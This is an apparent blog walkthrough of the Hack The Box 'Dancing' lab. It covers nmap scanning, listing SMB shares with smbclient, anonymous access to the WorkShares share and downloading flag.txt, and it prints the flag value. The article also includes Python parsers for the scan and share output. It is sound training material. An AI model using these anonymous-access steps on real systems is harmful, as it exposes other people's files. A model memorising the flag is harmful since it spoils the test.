System Weakness

System Weakness is a publication that specialises in publishing upcoming writers in cybersecurity and ethical hacking space. Our security experts write to make the cyber universe more secure, one vulnerability at a time.

Solving HTB Dancing CTF — A Step-by-Step Guide

In this article, we will walk through the process of solving the HTB CTF challenge “Dancing.” We’ll explore the various steps involved in uncovering the necessary information and executing the required commands to obtain the root flag. So, let’s dive in and solve this challenge together!

What does the 3-letter acronym SMB stand for?

Server Message Block

Server Message Block (SMB) is a network protocol used for sharing files, printers, and other resources between computers on a network.

What port does SMB use to operate at?

445

Port 445 is the default port used by SMB for communication. It allows devices to establish connections and share resources over a network.

What is the service name for port 445 that came up in our Nmap scan?

nmap -sV 10.129.75.93
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 15:36 +03
Nmap scan report for 10.129.75.93
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

When conducting a network scan using tools like Nmap, the service name for a specific port can provide information about the associated service. In this case, “microsoft-ds” indicates that port 445 is associated with Microsoft Directory Services, which includes SMB functionality. The trailing “?” in the scan output means Nmap took the name from its port table but could not confirm it with a version probe, which is why the VERSION column for that line is empty.
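The parser below is an added example for this walkthrough, not code from the original post or from the Nmap project. It reads Nmap’s normal-format output (the scan text is copied from the article’s own run), turns each port line into a record, and keeps track of which service names carried the trailing “?” so that unverified entries can be reviewed separately. The names parse_nmap, PortRecord, service_for_port and unconfirmed_ports are chosen here and are not part of Nmap.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Matches one Nmap port line such as "445/tcp open  microsoft-ds?". The VERSION
# column is optional because Nmap leaves it blank when no probe matched.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str      # service name with any trailing '?' removed
    version: str      # VERSION column, empty when Nmap printed none
    confirmed: bool   # False when Nmap marked the name with '?' (guessed from the port table)


def parse_nmap(output: str) -> list[PortRecord]:
    """Return one PortRecord per port line in Nmap normal (-sV) output."""
    records = []
    for line in output.splitlines():
        match = PORT_LINE.match(line.strip())
        if not match:
            continue  # banner, "Not shown", "Service Info" and summary lines
        service = match.group("service")
        records.append(PortRecord(
            port=int(match.group("port")),
            proto=match.group("proto"),
            state=match.group("state"),
            service=service.rstrip("?"),
            version=(match.group("version") or "").strip(),
            confirmed=not service.endswith("?"),
        ))
    return records


def service_for_port(records: list[PortRecord], port: int) -> str | None:
    """Service name Nmap reported for a port, or None if the port is not listed."""
    return next((r.service for r in records if r.port == port), None)


def unconfirmed_ports(records: list[PortRecord]) -> list[int]:
    """Ports whose service name Nmap could not verify (marked with '?')."""
    return [r.port for r in records if not r.confirmed]


# Scan text copied from the article's own Nmap run against the HTB lab host.
SCAN_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 15:36 +03
Nmap scan report for 10.129.75.93
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds
"""

if __name__ == "__main__":
    records = parse_nmap(SCAN_OUTPUT)
    for r in records:
        note = "" if r.confirmed else "  (name not verified by probe)"
        print(f"{r.port}/{r.proto} {r.state} {r.service} {r.version}{note}")
    print("port 445 service:", service_for_port(records, 445))
```

Running the block prints the three open ports and marks 445 as unverified; in a larger scan the unconfirmed_ports list is the set of services worth checking by hand before trusting the label.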

What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share?

-L

By using the -L flag with the SMB tool, such as smbclient, we can list the available shares on a remote system. This allows us to view the shared resources and gain insights into the file structure.

How many shares are there on Dancing?

smbclient -L 10.129.75.93
Password for [WORKGROUP\root]:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.75.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

By running the command smbclient -L 10.129.75.93 (replace the IP address with the target IP), we can retrieve the list of available shares on the target machine. In the output, you will find the names and types of shares, including “ADMIN$”, “C$”, “IPC$” , and “WorkShares”.
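The share-list parser below is an added example written for this walkthrough; it is not code from the original post or from the Samba project. It reads the smbclient -L output above (copied from the article’s own session), answers the “how many shares” question programmatically, and separates the administrative shares Windows creates by default (ADMIN$, C$, IPC$) from shares someone created on the host, which for a defender are the ones whose permissions need reviewing when they show up in a listing made with a blank password. The names parse_share_list, share_count and non_default_shares are chosen here.

```python
import re

# One row of the smbclient -L share table, e.g. "ADMIN$  Disk  Remote Admin".
# The Comment column is optional: "WorkShares  Disk" has none. Share names
# containing spaces are not handled by this simple pattern.
SHARE_ROW = re.compile(
    r"^(?P<name>\S+)\s+(?P<type>Disk|IPC|Printer)(?:\s+(?P<comment>.*))?$"
)

# Administrative shares Windows creates by default; the '$' hides them from browsing.
DEFAULT_ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}


def parse_share_list(output: str) -> list[dict]:
    """Extract share rows from smbclient -L output, stopping at the workgroup section."""
    shares = []
    in_table = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Sharename"):
            in_table = True          # header row: the table starts below it
            continue
        if not in_table or line.startswith("---"):
            continue                 # prompt lines before the table, and the rule under the header
        row = SHARE_ROW.match(line)
        if row is None:
            break                    # "Reconnecting with SMB1 ..." ends the table
        shares.append({
            "name": row.group("name"),
            "type": row.group("type"),
            "comment": (row.group("comment") or "").strip(),
        })
    return shares


def share_count(shares: list[dict]) -> int:
    return len(shares)


def non_default_shares(shares: list[dict]) -> list[str]:
    """Shares that are not Windows defaults; review their permissions first."""
    return [s["name"] for s in shares if s["name"] not in DEFAULT_ADMIN_SHARES]


# Listing copied from the article's smbclient -L run (blank password at the prompt).
LISTING = """\
Password for [WORKGROUP\\root]:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.75.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
"""

if __name__ == "__main__":
    shares = parse_share_list(LISTING)
    print(f"{share_count(shares)} shares listed")
    for s in shares:
        print(f"  {s['name']:<12} {s['type']:<8} {s['comment']}")
    print("non-default shares to review:", non_default_shares(shares))
```

On the article’s listing the count is 4 and the only non-default entry is WorkShares, which matches the share the walkthrough goes on to open with a blank password.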

What is the name of the share we are able to access in the end with a blank password?

WorkShares

After authenticating with a blank password using the smbclient command, we can navigate to the “WorkShares” share and access its contents. This share is accessible without requiring a password, providing us with an entry point to explore further.

What is the command we can use within the SMB shell to download the files we find?

get

Once we have accessed the desired share within the SMB shell, we can use the get command to download files. For example, after navigating to a specific directory using the cd command, we can run get <filename> to download the file named “filename” from the remote system to our local machine.

Submit root flag

smbclient \\\\10.129.75.93\\WorkShares
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                    D        0  Mon Mar 29 11:22:01 2021
  ..                   D        0  Mon Mar 29 11:22:01 2021
  Amy.J                D        0  Mon Mar 29 12:08:24 2021
  James.P              D        0  Thu Jun 3 11:38:03 2021
5114111 blocks of size 4096. 1748938 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                    D        0  Thu Jun 3 11:38:03 2021
  ..                   D        0  Thu Jun 3 11:38:03 2021
  flag.txt             A       32  Mon Mar 29 12:26:57 2021
5114111 blocks of size 4096. 1748938 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
# cat flag.txt
5f61c10dffbc77a704d76016a22f1664

After successfully navigating to the “WorkShares” share and exploring its contents, we discover a file named “flag.txt” within the “James.P” directory. By using the get flag.txt command, we can download the file, which contains the root flag for the CTF challenge.

In this article, we explored the process of solving the Dancing CTF challenge from Hack The Box. By understanding the concepts behind SMB, using the appropriate commands, and leveraging the smbclient tool, we were able to enumerate shares, access them, and retrieve the root flag. CTF challenges like this help enhance our skills in network enumeration, file sharing protocols, and command-line tools, contributing to our overall knowledge in cybersecurity and penetration testing.


Published in System Weakness


Written by Ahmet Talha Şen

Cybersecurity enthusiast sharing Cisco Packet Tracer notes, CTFs, Pentest and insights to help others stay protected. Let's make the internet a safer place!
